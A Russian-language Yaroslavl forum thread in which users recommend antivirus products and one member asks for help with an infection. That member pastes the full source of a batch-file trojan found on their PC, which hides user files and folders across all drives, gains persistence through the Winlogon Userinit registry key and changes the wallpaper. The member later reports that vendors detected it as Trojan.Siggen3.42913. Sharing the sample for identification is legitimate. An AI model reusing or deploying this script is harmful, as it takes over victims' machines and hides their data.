![]() |
Ярпортал: форум Ярославля ![]() |
![]() ![]() ![]() ![]() |
Здравствуйте, Гость ( Вход·Регистрация ) | Сделать Yarportal.Ru стартовой страницей |
![]() |
Страницы: (13) « Первая ... 11 12 [13] ( Перейти к первому непрочитанному сообщению ) | ![]() ![]() ![]() |
outsayder |
Дата 28.06.2011 - 17:16
|
||
![]() The IT Crowd ![]() ![]() ![]() ![]() ![]() ![]() ![]() Профиль Группа: Пользователи Сообщений: 15874 Пользователь №: 13051 Регистрация: 14.12.2006 - 15:26 ![]() |
эт вирус у тебя, он блокирует сайты антивирусов....... скачай на работе утилиту Dr.Web CureIT и прогони, думаю найдешь его... ![]() Это сообщение отредактировал outsayder - 29.06.2011 - 07:38 |
||
C_Nastya |
Дата 28.06.2011 - 23:05
|
Unregistered ![]() |
outsayder
Спасибо, все получилось ) |
|
Мезузу |
![]() |
![]() Козявка ![]() ![]() ![]() ![]() ![]() Профиль Группа: Пользователи Сообщений: 1543 Пользователь №: 40569 Регистрация: 10.08.2009 - 13:49 ![]() |
Схватил такую фигню в формате .bat
Появилось это ![]() Потом изчезли все папки на дисках. Ни один антивирус не опознал. ![]() Если кто разбирается подскажите откуда он взялся, куда делся и когда снова ожидать. Комп вылечил вручную. @Echo off set Data2=%TEMP%\Data2.exe set Data3=%TEMP%\Data3 set TBTask=%SYSTEMROOT%\TBTask\TBTask.exe set Service=%SYSTEMROOT%\TBTask\Service.dat set Config=%SYSTEMROOT%\TBTask\Config.dat set Remover=%SYSTEMROOT%\TBTask\Remover.bat set Generated=%SYSTEMROOT%\Generated.bmp find /i /c "Done" "%Config%"&& (del %Data3% >nul >%Remover% echo @Echo off >>%Remover% echo :dif1 >>%Remover% echo del %TEMP%\Data2.exe >>%Remover% echo if exist %TEMP%\Data2.exe goto dif1 >>%Remover% echo exit start %Remover% >nul exit) rem прерываем утановку, если троян уже однажды прожил свой цикл в системе if exist %Data3% (MD %SYSTEMROOT%\TBTask >nul attrib +h +s %SYSTEMROOT%\TBTask >nul move %Data2% %TBTask% >nul move %Data3% %Service% >nul reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "%SYSTEMROOT%\system32\userinit.exe,%SYSTEMROOT%\TBTask\TBTask.exe" /f >nul) rem установка нашего трояна в систему find /i /c "Ready2" "%Config%"|| goto dif2 attrib +h +s c:\*.txt /s >nul attrib +h +s c:\*.!ut /s >nul attrib +h +s c:\*.3gp /s >nul attrib +h +s c:\*.aac /s >nul attrib +h +s c:\*.ac3 /s >nul attrib +h +s c:\*.avi /s >nul attrib +h +s c:\*.chm /s >nul attrib +h +s c:\*.cue /s >nul attrib +h +s c:\*.djv /s >nul attrib +h +s c:\*.djvu /s >nul attrib +h +s c:\*.dmf /s >nul attrib +h +s c:\*.doc /s >nul attrib +h +s c:\*.docx /s >nul attrib +h +s c:\*.dot /s >nul attrib +h +s c:\*.flac /s >nul attrib +h +s c:\*.flv /s >nul attrib +h +s c:\*.gif /s >nul attrib +h +s c:\*.jar /s >nul attrib +h +s c:\*.htm /s >nul attrib +h +s c:\*.html /s >nul attrib +h +s c:\*.ifo /s >nul attrib +h +s c:\*.iso /s >nul attrib +h +s c:\*.jpeg /s >nul attrib +h +s c:\*.jpg /s >nul attrib +h +s c:\*.kar /s >nul attrib +h +s c:\*.m3u /s >nul attrib +h +s c:\*.m2v /s >nul attrib +h +s c:\*.m4v /s >nul attrib +h +s c:\*.mht /s >nul attrib +h +s c:\*.mid /s >nul attrib +h +s c:\*.midi /s >nul attrib +h +s c:\*.mkv /s >nul attrib +h +s c:\*.mov /s >nul attrib +h +s c:\*.mp3 /s >nul attrib +h +s c:\*.mp4 /s >nul attrib +h +s c:\*.mpeg /s >nul attrib +h +s c:\*.mpg /s >nul attrib +h +s c:\*.ogg /s >nul attrib +h +s c:\*.pdf /s >nul attrib +h +s c:\*.plc /s >nul attrib +h +s c:\*.pls /s >nul attrib +h +s c:\*.png /s >nul attrib +h +s c:\*.qt /s >nul attrib +h +s c:\*.rar /s >nul attrib +h +s c:\*.rtf /s >nul attrib +h +s c:\*.key /s >nul attrib +h +s c:\*.tif /s >nul attrib +h +s c:\*.tiff /s >nul attrib +h +s c:\*.torrent /s >nul attrib +h +s c:\*.ts /s >nul attrib +h +s c:\*.vob /s >nul attrib +h +s c:\*.wav /s >nul attrib +h +s c:\*.wma /s >nul attrib +h +s c:\*.wmv /s >nul attrib +h +s c:\*.zip /s >nul attrib +h +s c:\*.eml /s >nul set disk="d" :dif6 if not exist "%disk%:\" goto dif5 attrib +h +s %disk%:\*.* /s /d >nul :dif5 if %disk% == "d" (set disk="e" goto dif6) if %disk% == "e" (set disk="f" goto dif6) if %disk% == "f" (set disk="g" goto dif6) if %disk% == "g" (set disk="h" goto dif6) if %disk% == "h" (set disk="i" goto dif6) if %disk% == "i" (set disk="j" goto dif6) if %disk% == "j" (set disk="k" goto dif6) if %disk% == "k" (set disk="l" goto dif6) if %disk% == "l" (set disk="m" goto dif6) if %disk% == "m" (set disk="n" goto dif6) if %disk% == "n" (set disk="o" goto dif6) rem применение атрибутов к файлам и папкам reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "%SYSTEMROOT%\system32\userinit.exe," /f >nul >%Config% echo Done >%Remover% echo @Echo off >>%Remover% echo :dif1 >>%Remover% echo del %SYSTEMROOT%\TBTask\TBTask.exe >>%Remover% echo if exist %SYSTEMROOT%\TBTask\TBTask.exe goto dif1 >>%Remover% echo exit start %Remover% >nul exit :dif2 rem удаление трояна find /i /c "Ready1" "%Config%"|| goto dif3 move %Service% %Generated% >nul reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d %SYSTEMROOT%\Generated.bmp /f >nul reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d 0 /f >nul reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 2 /f >nul :dif3 rem установка обоев рабочего стола set ARG0=0 set /a ARG=ARG0 + 1 :dif4 find /i /c "l%ARG%" "%Config%"&& (set /a ARG=ARG + 1 goto dif4) >>%Config% echo l%ARG% if "%ARG%" == "19" >>%Config% echo Ready1 if "%ARG%" == "20" >>%Config% echo Ready2 rem счётчик запусков find /i /c "Registered" "%Config%"&& exit ping 1.1.1.1 -n 1 -w 20000 2>nul | find "ttl=" >nul start /min iexplore.exe ping 1.1.1.1 -n 1 -w 5000 2>nul | find "ttl=" >nul TASKKILL /IM iexplore.exe /T >nul >>%Config% echo Registered rem регистрация нового инсталла |
Andfox |
Дата 28.01.2012 - 00:00
|
Unregistered ![]() |
Harvey
А я себе не так давно поставил Доктора Веба , благо в инетмагазине скидка была и дешёво обошёлся, и довольно таки не плохим показался антивирусом, в разы получше чем аваст или авира, стоящие до этого. Ясен пень, бесплатные авира и аваст ваще не антивирусы, а чисто так, цветные иконки на панельке. ![]() |
|
Aylatan |
Дата 30.01.2012 - 11:40
|
Unregistered ![]() |
Kaspersky CRYSTAL - один из самых лучших(комплексная защита РС)
![]() |
|
Мезузу |
Дата 30.01.2012 - 11:54
|
![]() Козявка ![]() ![]() ![]() ![]() ![]() Профиль Группа: Пользователи Сообщений: 1543 Пользователь №: 40569 Регистрация: 10.08.2009 - 13:49 ![]() |
![]() Это сообщение отредактировал Мезузу - 9.02.2012 - 10:54 |
Мезузу |
Дата 30.01.2012 - 11:56
|
![]() Козявка ![]() ![]() ![]() ![]() ![]() Профиль Группа: Пользователи Сообщений: 1543 Пользователь №: 40569 Регистрация: 10.08.2009 - 13:49 ![]() |
![]() Это сообщение отредактировал Мезузу - 9.02.2012 - 10:55 |
Мезузу |
Дата 30.01.2012 - 23:52
|
![]() Козявка ![]() ![]() ![]() ![]() ![]() Профиль Группа: Пользователи Сообщений: 1543 Пользователь №: 40569 Регистрация: 10.08.2009 - 13:49 ![]() |
Первым откликнулся Dr.Web в 15.32
Ваш запрос был проанализирован. Соответствующая запись добавлена в вирусную базу Dr.Web и будет доступна при следующем обновлении. Угроза: Trojan.Siggen3.42913 Спасибо за сотрудничество. После одумался НОД32 в 22.06 Присланный Вами вирус определяется с версией базы данных сигнатур вирусов №6839 Спасибо за помощь в борьбе с вирусами. Здесь результаты он-лайн сканирования Это сообщение отредактировал Мезузу - 31.01.2012 - 00:12 |
Joy |
Дата 31.01.2012 - 12:56
|
Unregistered ![]() |
на работе SEP дома MS ES
|
|
shuric__k |
Дата 8.02.2012 - 04:06
|
Unregistered ![]() |
ДрВеб рулит
|
|
~Vladislav~ |
Дата 8.02.2012 - 08:51
|
Unregistered ![]() |
не так давно перешел на антивир от компании symantec, вообще классная штука.
|
|
![]() |
![]() ![]() ![]() |
Правила Ярпортала (включая политику обработки персональных данных)